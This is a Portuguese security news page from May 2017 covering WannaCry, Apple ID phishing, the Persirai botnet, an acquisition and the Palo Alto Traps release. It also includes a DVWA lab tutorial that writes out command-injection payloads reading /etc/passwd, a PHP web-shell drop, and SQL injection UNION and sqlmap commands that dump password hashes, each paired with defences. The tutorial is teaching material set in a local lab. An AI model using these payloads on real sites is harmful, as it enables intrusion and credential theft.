Avast explica o ataque de ransomware no mundo

A Telefónica, muitas outras empresas da Espanha e o Departamento de Saúde da Inglaterra foram atacados por ransomware hoje, 12 de maio de 2017.

Jakub Kroustek, líder da equipe do laboratório de ameaças da Avast, explica o que aconteceu: "Nós observamos um pico maciço de ataques do ransomware "WanaCrypt0r 2.0" hoje, com mais de 36.000 detecções, até agora. Uma observação interessante que fizemos é que a maioria dos ataques de hoje está direcionada para a Rússia, Ucrânia e Taiwan. Este ataque, mais uma vez, prova que o ransomware é uma poderosa arma que pode ser usada contra consumidores e empresas.

Recentemente, observamos grandes variedades de ransomware sendo entregues através de documentos maliciosos do Office, que contêm macros, enviados via e-mail, bem como através de kits de exploração. Se a contamminação do ransomware é via anexo de email, um documento do Office malicioso precisa ser aberto e, em seguida, as macros ser habilitadas para que o ransomware seja baixado. No caso do ransomware infectar via um exploit, normalmente um site malicioso é visitado e, em seguida, um computador com uma vulnerabilidade tipo zero day é explorado para a infecção com ransomware.

O impacto financeiro do ataque à Telefônica deve ser significativo, e vai muito além do resgate exigido. Segundo informações, 85% dos computadores da empresa foram afetados e a Telefonica pediu que os funcionários desligassem seus computadores e voltassem para casa, o que deveria ter sérias conseqüências financeiras para a empresa.

A Telefonica não deve levar muito tempo para remover o ransomware, mas se a empresa não tiver backup dos arquivos dos funcionários, isso pode demorar um pouco antes que serem recuperados, caso estejam criptografados pelo ransomware."

Golpe de phishing revela aliança entre crime físico e virtual

Tutorial para roubo de Apple ID é vendido no Underground brasileiro por R$ 135

 

São Paulo, maio de 2017 – No último mês, mais uma vítima foi abordada por bandidos nas ruas brasileiras e teve seu iPhone roubado.  Crime bastante comum salvo por um detalhe: os ladrões “reais” engatilharam um modus operandi que é roubar fisicamente o smartphone e – por meio de uma página de phishing e um SMS projetado socialmente fingindo ser a Apple – os hackers tentam conseguir as credenciais do Apple ID da vítima.

 

A Trend Micro – empresa especializada na defesa de ameaças digitais e segurança na era da nuvem – foi mais a fundo e detalhou quais os passos envolvidos neste tipo de golpe. Enquanto o aparelho está em funcionamento, é possível descobrir o número do aparelho e tentar mudar a senha dos aplicativos de redes sociais (e possivelmente do e-mail) instalados – provavelmente para extorquir a vítima no futuro. Os cibercriminosos tentam agir o mais rápido possível antes do alvo desligar o aparelho.

 

Um dia após o furto, a vítima mencionada no começo do texto, recebeu uma mensagem de SMS em seu novo telefone. Escrita em português, dizia:


​ 


O link que acompanhava a mensagem – hxxp://busca-devices[.]pe[.]hu – direcionava para um formulário de login solicitando as credenciais do Apple ID. Com a investigação da Trend Micro, logo se desconfiou que o endereço poderia ser uma página de phishing.

 

 

Após verificar a última localização do iPhone roubado, o site oficial do iCloud de fato confirmou que era o local onde a vítima havia sido roubada.

 

Página phishing pedindo o registro de credenciais Apple ID



Roubo físico aliado ao Cibercrime

 

A indefinição do limite entre o roubo físico/tradicional e o cibercrime – e, em particular, o trabalho aparentemente em equipe entre os ladrões e os cibercriminosos pode resultar em possíveis ataques ainda maiores e mais complicados.

 

Além disso, em investigação no Underground Brasileiro, a Trend Micro encontrou uma página de phishing da Apple sendo negociada sob o valor de R$ 135 (equivalente a aproximadamente 43 dólares em 4 de maio de 2017). A página era oferecida para aluguel com um vídeo tutorial explicando como o serviço funciona.

 

Não se pode afirmar a correlação direta entre o assalto mencionado e a venda de tutoriais para o golpe via phishing Apple.  No entanto, um dos commodities mais vendidos no submundo online brasileiro, são as vendas de credenciais Apple ID. Inclusive, este tipo de ataque tem sido relatado no país desde o começo de 2015.

 

Além do roubo de informações pessoais, a obtenção das credenciais da Apple ID permite ao hacker desativar o recurso de bloqueio de ativação em dispositivos iOS, o que lhes permitiria limpar o telefone (como parte de um ataque ou até mesmo para reutilizá-lo).

 

 

Anúncio de página phishing do iCloud no Underground brasileiro




Boas práticas

 

Os crimes físicos e virtuais podem, de fato, trabalhar lado a lado com a finalidade de criarem esquemas maliciosos e ataques de maiores proporções. Por isso, a segurança física aliada à cibersegurança é ainda mais válida. Não só os usuários finais devem redobrar a proteção, mas as empresas se conscientizarem que os riscos de ataques online/virtuais podem ser igualmente prejudiciais.

 

Identificar sinais suspeitos para mitigar golpes phishing e adotar políticas de privacidade para aparelhos BYOD são apenas algumas das melhores práticas de segurança adotadas. Tais medidas são complementadas pela proteção de senhas até o uso de biometria ou PINs elaborados para impedir o acesso não autorizado aos aplicativos do dispositivo móvel.

 

Com ajuda da PhishLabs, a Trend Micro conseguiu derrubar as páginas de phishing que ainda estavam online. Também foi comunicado à Apple as descobertas relacionadas à ameaça. Os domínios descobertos pela Trend Micro relacionados a este golpe encontram-se aqui.

 

Botnet descoberta pela TrendMicro pode pegar 120 mil câmeras

A Trend Micro – empresa especializada na defesa de ameaças digitais e segurança na era da nuvem – acaba de detectar um novo botnet de Internet das Coisas (IdC) chamado Persirai (detectado pela Trend Micro como ELF_PERSIRAI.A).

Ele foi visto atacando mais de 1.000 modelos de Câmeras Internet Protocol (IP) com base em vários produtos de uma fabricante chinesa. O surgimento desse botnet ocorreu logo após o Mirai – malware de backdoor com código aberto que causou alguns dos ataques de Serviço Negado (DDoS) mais notáveis de 2016.

A Trend Micro detectou aproximadamente 120 mil câmeras IP que estão vulneráveis ao ELF_PERSIRAI via Shodan. Boa parte desses usuários vulneráveis não sabem que suas câmeras IP estão expostas à Internet.

Isso faz com que seja significativamente mais fácil que os atacantes obtenham acesso à interface online da câmera IP por meio da Entrada TCP 81. O Brasil foi mapeado como um dos países em que 3,43 % das câmeras atacadas estão em uso. 


Número de câmeras IP vulneráveis (dados de 26 de abril de 2017)





 

Comportamento e Análise

Câmeras IP normalmente usam um Plug e Play Universais (UPnP), protocolos de rede que permitem aos dispositivos abrirem uma entrada no roteador e agirem como um servidor, tornando-as alvos visíveis para os malware de IoT.

Depois de fazer login na interface vulnerável, o invasor pode executar um comando que força a câmera IP a se conectar a um site de download.

Depois das amostras serem baixadas e executadas, o malware se deleta e só será executado na memória. Ele também irá bloquear o exploit zero-day indicando oftpupdate.sh e ftpupload.sh to /dev/null para impedir que outros atacantes ataquem a câmera IP da vítima. No entanto, uma vez que a câmera é reinicializada, automaticamente ela se tornará vulnerável.

Após receber comandos do servidor, a câmera IP automaticamente começa a atacar outras do mesmo modelo, explorando uma vulnerabilidade zero-day que foi divulgada há alguns meses. Por meio dessa vulnerabilidade, os atacantes acessam o arquivo de senha do usuário, fazendo com que eles tenham os meios para comandar as injeções mesmo que a senha seja forte.

Fluxo de ataque do ELF_PERSIRAI.A




Conclusão e Mitigação

A Internet das Coisas passou a ganhar impulso entre os usuários comuns. Por isso os cibercriminosos podem começar a optar por deixar de lado servidores NTP (Network Time Protocol) e DNS (Domain Name System) e preferir ataques de DDoS, concentrando-se em dispositivos vulneráveis — um problema agravado pelos usuários que usam poucas medidas de segurança.

Boa parte desses ataques foi causado pelo uso da senha padrão na interface do dispositivo. No entanto, uma senha forte não garante que o dispositivo permaneça seguro. Proprietários de câmera IP devem implementar outras medidas para garantir que seus dispositivos fiquem protegidos contra ataques externos. Além de usar uma senha forte, os usuários também devem desativar a UPnP em seus roteadores para impedir a abertura de entradas de Internet externas sem qualquer aviso de dispositivos dentro da rede.

A segurança da IoT não depende só dos usuários — também dependem dos fornecedores, que devem ser os responsáveis por garantir que seus dispositivos permaneçam seguros e sempre atualizados.

Exploit de websites

Carlos Rodrigues
Especialista de Eng. de Telecomunicações e Segurança Computacional
Fundador e mentor do Projeto Open Source LibertyNET
Para o inicio do estudo usaremos o projeto DVWA (DAMN VULNERABLE WEB APP) que pode ser facilmente encontrado no site HTTP://DVWA.CO.UK ou no repositório geral do Github no endereço HTTPS://GITHUB.COM/ETHICALHACK3R .
Previamente instalamos uma máquina virtual, com uma preparação em ambiente Linux, utilizando uma distribuição para a realização de ataques de penetração e vulnerabilidades KALI LINUX. Este projeto pode ser encontrado no seguinte endereço HTTPS://KALI.COM .

1º PASSO

Os comando utilizados para fazer o download da framework, criar as pastas necessárias e a descompactação são apresentados em baixo.
# cd /var/www/html
# wget https://github.com/ethicalhack3r/DV… && unzip master.zip
# mv DVWA-master /var/www/html/dvwa
# chmod -R 777 dvwa
# cp config/config.inc.php.dist config/config.inc.php
De seguida é necessário abrir o arquico config/config.inc.php que foi renomeado para preservar as alterações a serem realizadas, e observar os campos:
$_DVWA[ ‘db_password’ ] = ‘p@ssw0rd’;
$_DVWA[ ‘default_security_level’ ] = ‘impossible’;
O campo $_DVWA[ ‘db_password’ ] = ‘p@ssw0rd’; deve ficar em branco, sem password, pois por padrão o mysql no Linux vem sem senha para o root.
O campo $_DVWA[ ‘default_security_level’ ] = ‘impossible’; deve ser alterado para low, de forma que os testes se iniciem por um nível de dificuldade baixo.
Depois destes passos inicias de configuração da framework, deve iniciar o mysql e criar a base de dados necessária para o funcionamento da aplicação web, os comandos primários são.
# service mysql start
# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.6.27-2 (Debian)
Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
mysql>
# mysql > create database dvwa;
Depois de criar a base de dados, pode confirmar a sua existência com o comando:
mysql> show databases;
+——————–+
| Database |
+——————–+
| information_schema |
| dvwa |
| mysql |
| performance_schema |
+——————–+
4 rows in set (0.06 sec)
mysql> use dvwa;
Database changed
mysql> show tables;
Empty set (0.00 sec)
mysql>
Na imagem podemos observar mais detalhamente cada passo, onde se verifica o funcionamento do mysql, e o estado da criação da tabela dvwa.
Por fim devemos iniciar o web server apache na máquina e iniciar o browser com os comandos.
# service apache2 start
Se todos os passos foram realizados com sucesso é possível ver a abertura da seguinte página no browser.
Para entrar basta digitar em
Username: Admin
Password: Password
E vai ser encaminhado para a página de Database Setup, onde precisa de clicar no botão Create / Reset Database para criar as tabelas necessárias à execução dos ataques.
Algumas funções têm que ser ativadas no arquivo php.ini do apache, como exemplo tempos as seguintes:
* `allow_url_include = on` – Allows for Remote File Inclusions (RFI)
* `allow_url_fopen = on` – Allows for Remote File Inclusions (RFI)
* `safe_mode = off` – (If PHP <= v5.4) Allows for SQL Injection (SQLi)
* `magic_quotes_gpc = off` – (If PHP <= v5.4) Allows for SQL Injection (SQLi)
* `display_errors = off` – (Optional) Hides PHP warning messages to make it less verbose
Após clicar no botão para criar as tabelas, podemos observar elas no mysql para se ter a certeza que tudo foi efetuado corretamente, antes de se dar inicio aos testes de laboratórios.
Se a tabela dvwa for apresentada é porque tudo foi criado corretamente, agora basta entrar na página principal em:

2º PASSO

Agora neste segundo passo, vamos analisar algumas vulnerabilidades e observar o código fonte, de forma a entender porque as falhas são executadas com sucesso, todas as vulnerabilidades são consideradas ainda existentes nos sistemas de hoje em dia, pois a programação para desenvolvedores web é virada para o quesito de operação/funcionalidade e não o quesito de segurança dos dados, criando desta forma muitas brechas que são exploradas por usuários mal intencionados que têm o objetico de provocar dano aos alvos mais visados ou ganhar algum tipo de vantagem sobre o sistema expostos.
As vulnerabilidades são:
1. Command Injection
2. SQL Injection
3. CSRF
4. File Upload
1. Command Injection: A injeção de comandos aproveita falhas em sistemas que interagem com sistemas operativos, normalmente via formuários e campos de input de nomes e de busca. A injeção ocorre quando o atacante consegue inserir um ou mais comandos dentro de um campo sem que o mesmo tenha escapado caracteres especiais ou comandos primários do sistema operacional.

Ataque

Com o DVWA na seguraça miníma (Low), podemos observar o código fonte em baixo e ententer que o próprio sumbit executa uma função padrão do bash, que é o shell_exec(), desta forma qualquer comando, desde que escrito corretamente e adicionando por exemplo && ou um pipe | para concatenar vai ser executado sem dificuldade dentro da máquina alvo.
<?php
if( isset( $_POST[ ‘Submit’ ] ) ) {
// Get input
$target = $_REQUEST[ ‘ip’ ];
// Determine OS and execute the ping command.
if( stristr( php_uname( ‘s’ ), ‘Windows NT’ ) ) {
// Windows
$cmd = shell_exec( ‘ping ‘ . $target );
}
else {
// *nix
$cmd = shell_exec( ‘ping -c 4 ‘ . $target );
}
// Feedback for the end user
echo “<pre>{$cmd}</pre>”;
}
?>
Com isto podemos executar o comando:
127.0.0.1 && pwd
Para termos a certeza onde estamos físicamente dentro da raiz / do linux, como se pode observar na figura em baixo, encontramo-nos na pasta /var/www/html/dvwa/vulnerabilities/exec.
Com esta informação em mãos podemos agora navegar por todo o disco do sistema operativo e descobrir ficheiro que contenham informações importante a serem exploradas.
Pode também saber que usuário é neste momento que executa os comandos, ou ver que processos estão rodando como root, de forma a serem explorados.
Comandos:
127.0.0.1 %% uname -a
127.0.0.1 && ps -aux | grep root
127.0.0.1; cat /etc/passwd
127.0.0.1; cat /var/www/html/dvwa/vulnerabilities/exec/index.php
Então a partir destas informações, já se pode iniciar ou finalizar aplicativos/ serviços, como exemplo um anti-virus, sistemas de firewall, logs de erro e captura, entre muitas outras opções de ataque.
Outro exemplo:
Outro exemplo:
Uma abordagem diferente, seria upar uma shell para dentro do servidor, uma vez que podemos executar comandos livremente, para isso é possível executar o comando a seguir para se visualizar que permissões existem para o usuário que interage com o browser.
127.0.0.1 && ls -alh
Agora com esta informação podemos visualizar que temos permissão de ler, escrever e executar, isso pode-se ver porque a pasta atual onde estamos é representada no linux por (.) um ponto.
Para executar este comando é necessário utilizar o burp Suite e enviar um comando básico no browser, como exemplo:
Depois de interceptar os pacotes, clicamos na captura realizada e selecionamos com o lado direito do rato send to repeater, com isto podemos observar a figura em baixo:
Com esta informação, podemos agora simplesmente concatenar comando diretamente no Burp e enviar em formato GET como se fosse o browser a enviar.
Com isso podemos enviar a seguinte string pelo Burp:
ip=127.0.0.1;echo “<?php system(\$_GET[‘c’]); ?>” > shell.php&Submit=Submit
Isto faz com que o arquivo shell.php seja criado e fique acessível pelo browser, sendo que se fosse uma shell real o site já estaria completamente comprometido e uma invasão teria sido bem sucedida, mas no caso o que a shell faz é ler o caracter c, permitindo que se digite comandos na frente e serem interpretados diretamente no brower, como se pode ver a seguir.

ifconfig

Source Code

Caso a leitura fique difícil, pode-se abrir o código fonte da página pois uma formatação com as tags <pre></pre> são pré-definidas.

Defesa

Como defesa pode ser criado um array na linguagem PHP de forma que elas não sejam permitidas de ser introduzidas.
$substitutions = array(
‘&’ => ”,
‘;’ => ”,
‘| ‘ => ”,
‘-‘ => ”,
‘$’ => ”,
‘(‘ => ”,
‘)’ => ”,
‘`’ => ”,
‘||’ => ”,
);
Ou no caso desta medida não ser suficiente, pode-se utilizar a função do PHP explode() para juntar tudo e fazer uma verificação octeto a octeto, para não dar margem de introdução de caracteres maliciosos, no campo submit.
$octet = explode( “.”, $target );
if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
// If all 4 octets are int’s put the IP back together.
$target = $octet[0] . ‘.’ . $octet[1] . ‘.’ . $octet[2] . ‘.’ . $octet[3];
———————————-//———————–//————————————-
2. SQL Injection: O SQL Injection aproveita falhas em sistemas que interage com bases de dados via SQL. A injeção de SQL ocorre quando o atacante consegue inserir uma série de instruções SQL dentro de uma consulta (query) através da manipulação das entradas de dados de uma aplicação.

Ataque

Com o DVWA na seguraça miníma (Low), podemos observar o código fonte em baixo e ententer rapidamente que o PHP apenas recebe os campos do formulário, mas não os trata, nenhum tratamento de carateres especiais nem nenhuma função é verificada, apenas se os campos estão vazios, o que torna este campo muito inseguro.
<?php
if( isset( $_REQUEST[ ‘Submit’ ] ) ) {
// Get input
$id = $_REQUEST[ ‘id’ ];
// Check database
$query = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’;”;
$result = mysqli_query($GLOBALS[“___mysqli_ston”], $query ) or die( ‘<pre>’ . ((is_object($GLOBALS[“___mysqli_ston”])) ? mysqli_error($GLOBALS[“___mysqli_ston”]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . ‘</pre>’ );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Get values
$first = $row[“first_name”];
$last = $row[“last_name”];
// Feedback for end user
echo “<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>”;
}
mysqli_close($GLOBALS[“___mysqli_ston”]);
}
?>
Neste caso falhas introdutórias de SQL podem ser testadas pela introdução de aspas simples ‘ onde se pode observar um erro no browser, caso este esteja vulnerável a este tipo de ataque.
Com isto pode-se executar de seguinda as conhecidas strings de vulnerabilidades SQL injection para se ter acesso a uma determinada área administrativa ou de login, com os comandos:
‘OR’ 1=1
“OR” 1=1
“OR” 1=1 –
‘OR’ 1=1 –
No nosso exemplo como estamos a trabalhar com PHP, o normal é a base de dados ser mySQL, então o primeiro comando com as aspas simples deve apresentar um erro. Entretanto vamos estar a trabalhar com a DVWA low.
Com este simples comando, já trouxemos todos os usuários da base de dados e sabemos o primeiro e último nome cadastrado. Também podemos observar a construção da URL, pois o site está a enviar os dados com GET, caso estivesse a utilizar POST, esta vulnerabilidade seria mais dificil de se saber, pois não fica visível no browser.
Podemos agora trazer o nome da tabela em uso e o nome do usuário, com o comando:
1′ and 1=1 union select database(), user()#
De seguida sabendo que por padrão o Mysql tem uma esquema de tabelas conhecido pelo nome de information_schema é possível retornar todas as tabelas do banco de dados, mesmo não sabendo as colunas a se procurar nem o nome da tabela, com o seguinte comando.
1′ and 1=1 union select null, table_name from information_schema.tables#
Devido à tabela ser bastante grande, omitimos a parte final da apresentação.
Neste momento, basta se procurar por uma tabela que tenha o nome de users, user, usuarios, nomes, Etc.. para se encontrar o pretendido. Por norma estes nomes são padrões, por convenção entre programadores.
Agora, estamos prontos para o comando final, pois já sabemos a nome da tabela e os campos são sempre padrão por convenção, raros são os casos em que mudam.
1′ and 1=1 union select user, password from users#
Podemos observer que os usuários não apresentam as passwords em texto claro, isto deve-se ao fato de que as senhas são armazenadas no banco de dados utilizado uma Hash do tipo MD5 para tornar a sua leitura complicada, porém por se tratar de MD5 esta é facilmente quebrável.
ID: 1′ and 1=1 union select user, password from users#
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
Então agora que já sabemos a formação da URL o nome do danco de dados, nome da tabela e os campos, podemos optimizar o processo com o sqlmap que é uma forma rápida e simples de se executar o mesmo que aqui foi apresentado mas manualmente.
Para tal, iniciamos o Burp de novo e capturamos o Request para o servidor de forma a o podermos utilizarmos dentro do sqlmap em forma de ficheiro.
E executamos o comando no sqlmap:
# sqlmap -r get -p id –dbms=mysql -D dvwa -T users –dump
Uma vez que sabemos o Request do tipo GET:
GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit%23 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: security=low; PHPSESSID=ktf4fh5n9aeg7voistrst3an20
Sabemos o parâmetro que se apresenta vulnerável (id), sabemos qual é o tipo da base de dados (mysql), sabemos o nome da base de dados (dvwa) e sabemos o nome da tabela que contem o nome dos usuários e password, basta fazer um dump da informação e obtemos o que já tinhamos obtido anteriormente, mas agora de forma automática.
Table: users
[5 entries]
+———+————————————————–+———+———————————-+———–+————+———————+————–+
|user_id|avatar|user|password|last_name|first_name|last_login|failed_login|
+———+————————————————–+———+———————————-+———–+————+———————+————–+
| 1 | http://127.0.0.1/dvwa/hackable/user… | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | admin | admin | 2017-05-09 07:16:51 | 0 |
| 2 | http://127.0.0.1/dvwa/hackable/user… | gordonb | e99a18c428cb38d5f260853678922e03 | Brown | Gordon | 2017-05-09 07:16:51 | 0 |
| 3 | http://127.0.0.1/dvwa/hackable/user… | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | Me | Hack | 2017-05-09 07:16:51 | 0 |
| 4 | http://127.0.0.1/dvwa/hackable/user… | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | Picasso | Pablo | 2017-05-09 07:16:51 | 0 |
| 5 | http://127.0.0.1/dvwa/hackable/user… | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | Smith | Bob | 2017-05-09 07:16:51 | 0 |
+———+————————————————–+———+———————————-+———–+————+———————+————–+
Embora seja um pouco dificil de ler, podemos também observar que o programa criou um CSV no caminho
Algumas opções do sqlmap são:
–current-db
Mostra o banco de dados atual
Ex: sqlmap -u http://127.0.0.1/dvwa/vulnerabiliti… –current-db
–current-user
Mostra o usuário utilizado do banco de dados atual
Ex: sqlmap -u http://127.0.0.1/dvwa/vulnerabiliti… –current-user
–dbs
Lista os bancos de dados do DBMS
–tables
Mostra as tabelas do banco selecionado
Ex: sqlmap -u http://127.0.0.1/dvwa/vulnerabiliti… -D –tables
–columns
Mostra as colunas da tabela selecionada
Ex: sqlmap -u http://127.0.0.1/dvwa/vulnerabiliti… -D dvwa -T users –columns
–dump
Extrai as informações da colunas selecionada
Ex: sqlmap -u http://127.0.0.1/dvwa/vulnerabiliti… -D dvwa -T users -C ‘user,password’ –dump
–is-dba
Verifica se o current-user é o administrador do banco de dados
–search
Procura na db seletivamente por uma palavra, seja banco, tabela ou coluna
Ex: sqlmap -u http://127.0.0.1/dvwa/vulnerabiliti… –search –C ‘password’

Defesa

Ao nível de defesa do lado do servidor para se evitar que os erros sejam expostos no browser do atacante, quando este provoca um erro deliberadamente, este pode ser mitigado da seguinte forma.
Dentro do diretório /etc/php*/apache2/ temos que editar o arquivo php.ini
* Número da versão do PHP instalado. Ex: php5
O php.ini é responsável pelas configurações iniciais do apache e deve-se desabilitar a amostragem de erros, da seguinte forma:
Display_errors = Off
Depois é só preciso salvar as alterações dentro do arquivo e restaurar o serviço com o comando:
# service apache2 restart
As do banco de dados devem estar protegidas com um tipo de hash mais forte que o MD5, como por exemplo o SHA256 e o banco de dados não deve rodar como root, todos os diretorios onde a página web for apresentada, devem ter as permissões CHMOD e permissões CHGRP definidas de forma que os usuários externos ao sistema só tenham permissão de leitura e nunca de escrita, em alguns casos é necessário a permissão de execução, mas apenas quando esta necessidade se verifica é que deve ser configurada.
A nível do código da página, deve-se manter uma segurança minima na entrada de caracteres com funções como mysqli_real_escape_string() e a isset(), para os campos não serem enviados vazios ou com carateres e strings proveninetes do mysql.
$id = $_POST[ ‘id’ ];
$id = ((isset($GLOBALS[“___mysqli_ston”]) && is_object($GLOBALS[“___mysqli_ston”])) ? mysqli_real_escape_string($GLOBALS[“___mysqli_ston”], $id ) : ((trigger_error(“[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.”, E_USER_ERROR)) ? “” : “”));
Para uma segurança mais forte a verificação do Token do usuário com a sua sessão é essencial, para se saber que o usuário é legítimo.
if( isset( $_GET[ ‘Submit’ ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ ‘user_token’ ], $_SESSION[ ‘session_token’ ], ‘index.php’ );
Uma abordagem orientada a objeto conhecido no PHP como PDO também impossibilita a entra de vulnerabilidades dentro do banco de dados.
$data = $db->prepare( ‘SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;’ );
$data->bindParam( ‘:id’, $id, PDO::PARAM_INT );
$data->execute();
$row = $data->fetch();
———————————-//———————–//————————————-

BC Partners e Medina Capital concluem aquisição da Easy Solutions

Empresa da Total Fraud Protection se junta à Cyxtera Technologies

MIAMI & BOGOTÁ – 10 de maio de 2017 – As empresas de private equity BC Partners e Medina Capital anunciaram hoje a conclusão da aquisição da Easy Solutions, bem como do portfólio de centros de dados da Centurylink e de centros de dados e análises de dados da Medina Capital. As transações avaliadas em aproximadamente 2,8 bilhões de dólares culminaram na formação de uma empresa chamada Cyxtera Technologies, que iniciou suas operações imediatamente. Fundada originalmente na Colômbia, a Easy Solutions tem sua sede em Miami – Flórida, com escritórios em Atlanta, São Paulo, Londres, Dubai e Tóquio.

A Cyxtera reúne um centro de dados global e um portfólio de segurança diversificado, moderno e baseado na nuvem, composto por quatro empresas inovadoras: Cryptzone, Catbird, Easy Solutions e Brainspace. O portfólio do grupo oferece uma plataforma de infraestrutura poderosa, segura e resistente, desenvolvida para as complexas e híbridas arquiteturas de TI de hoje, e capaz de proteger e suportar infraestruturas dedicadas e provedores de serviços na nuvem públicos e privados, com recursos de software e serviços que estendem a proteção a ambientes locais. A Cyxtera atende a mais de 3.500 clientes em todo o mundo.

“A Easy Solutions está bem posicionada para atender à crescente demanda por proteção antifraude decorrente da transformação digital experimentada pelas empresas. Ao nos tornarmos uma empresa Cyxtera, nós teremos mais recursos, maior capacidade e um alcance global que nos possibilitarão inovar mais rápido, expandir as nossas soluções e atender melhor aos nossos clientes e parceiros em todo mundo”, afirmou Ricardo Villadiego, CEO da Easy Solutions. “A possibilidade de trabalhar com um portfólio completo de recursos de segurança complementares, que inclui detecção e prevenção de fraude, machine learning e perímetro definido por software, nos permitirá desenvolver e oferecer as mais avançadas soluções de proteção contra fraude que o mundo já viu.”

Manuel D. Medina, fundador e sócio-gerente da Medina Capital e fundador e ex-CEO da Terremark Worldwide, comanda a Cyxtera.  A equipe executiva da Cyxtera também conta com líderes das cinco empresas adquiridas, como o próprio Villadiego, representando a Easy Solutions, e uma lista de veteranos dos setores de infraestrutura empresarial e segurança cibernética.

 "As últimas duas décadas trouxeram mudanças significativas na disponibilidade, agilidade e escalabilidade das empresas de TI, e a próxima era deve ser marcada por uma revolução semelhante na infraestrutura de segurança", afirmou Medina.  "Estou orgulhoso e empolgado por ter a oportunidade de trabalhar com uma equipe de profissionais experientes, com excelência comprovada nas áreas de infraestrutura de TI e segurança cibernética, no lançamento de uma nova plataforma global para ajudar os nossos clientes a operar e proteger seus sistemas empresariais e aplicações críticas. Estou muito feliz por dar as boas-vindas para a nossa equipe, nossos clientes e nossos parceiros à Cyxtera."

Cibercriminosos atacam alegando restituição do IR

Poucos dias após o fim do prazo da entrega da declaração o imposto de renda, usuários sofrem ameaças dos criminosos cibernéticos

A Nodes Tecnologia, distribuidora das soluções Avira no Brasil, identificou uma ação os criminosos cibernéticos enviando e-mail falso em nome da Receita Federal informando que o contribuinte teria direito a uma restituição de no valor de R$3142,64 referentes aos anos 2013/2015, após análise das declarações deste período.

A mensagem pede para o usuário de computador abrir um formulário que, na verdade, é um link para descarregar um arquivo compactado com um vírus para roubar dados bancários do usuário.
 
Eduardo Lopes, diretor da Nodes Tecnologia, orienta não clicar no link e a não acreditar que a Receita Federal faça uma comunicação deste tipo. “Quando a Receita Federal necessita obter detalhes sobre uma declaração, ela envia um comunicado pelos Correios. Por tanto, esta mensagem é um ataque cibernético, que deve ser evitado a partir da atenção do usuário a este tipo de ação criminosa”, afirma.

O especialista reitera o que vem orientando quando é questionado sobre o assunto: o usuário deve manter atualizados o sistema operacional e todos os programas e aplicativos instaladas no PC e aparelho móvel, incluindo o software antivírus: “Esta é uma tarefa fácil e que eleva o nível de proteção contra os ataques dos criminosos cibernéticos’, enfatiza Lopes Freire.

Proteção endpoint da Palo Alto agora suporta macOS e Android

A Palo Alto Networks anuncia recursos adicionais ao Traps™, sua solução de proteção avançada para endpoint, com o objetivo de reforçar a prevenção contra malware e exploit, além de ampliar o suporte para outros sistemas operacionais, incluindo macOSTM e AndroidTM (beta).

Um substituto comprovado de antivírus para organizações que precisam seguir a regulamentação HIPAA ou o padrão PCI-DSS, o Traps emprega uma abordagem de múltiplos módulos de prevenção para bloquear tanto malwares conhecidos quanto os desconhecidos, assim como os exploits, antes que comprometam os endpoints. Os módulos são injetados nos processos do usuário e agem como “armadilhas” para acionar e bloquear a técnica de exploit do invasor na primeira tentativa.

“A abordagem única do Traps interrompe ataques preventivamente, bloqueando as técnicas que os agentes maliciosos mais confiam, incluindo ataques que nunca foram vistos anteriormente. Os avanços anunciados estendem a proteção para macOS e Android e acrescentam técnicas de ataques que podem ser prevenidos, incluindo ataques baseados em macro e em script, técnicas de impressão digital, e escalação de privilégios no kernel. Essas proteções aumentam o poder de nossa plataforma de segurança para evitar que ameaças avançadas ou sem conhecimento prévio se infiltrem nas empresas.”, conta Lee Klarich, vice-presidente executivo da Palo Alto Networks.

Apesar da crescente atenção voltada à segurança, os cibercriminosos continuam comprometendo os endpoints em uma velocidade que ultrapassa os investimentos organizacionais. Os produtos de antivírus tradicionais e de última geração buscam alternativas para fechar essa lacuna, mas apenas substituem um método ineficaz de detecção de malware por outro, sem avanço significativo na capacidade de identificar e prevenir exploit e malware desconhecidos.

“O cenário atual de ciberataques demanda que as organizações implementem estratégias para prevenir violações. A abordagem da Palo Alto Networks para segurança de endpoints permite que as empresas substituam a tecnologia tradicional, conhecida por ser ineficiente e pesada. A segurança avançada de endpoints do Traps aborda a prevenção de ameaças de maneira única, identificando e bloqueando técnicas de exploit, além de malwares conhecidos e sem conhecimento anterior, para prevenir violações efetivamente, independentemente de onde essa ameaça se origine.”, conta Jeff Wilson, diretor sênior de pesquisa de Tecnologia de Cibersegurança da IHS Markit.

Os recursos adicionais anunciados como parte do Traps versão 4.0 atendem aos desafios do mercado, além de adicionar suporte para macOS e Android (beta) e diversos módulos de prevenção desenvolvidos para detectar e impedir ransomware e outras ameaças avançadas.

Adicionalmente, quando implementado em conjunto com outros elementos da plataforma de última geração de segurança da Palo Alto Networks, permitem aos clientes correlacionar ocorrências de endpoint e segurança de rede com informação inteligente de ameaças via Panorama, ferramenta de gerenciamento centralizado, para diminuir riscos de violações cibernéticas pelos endpoints, firewalls, nuvens e aplicações SaaS.

Os principais avanços anunciados incluem:

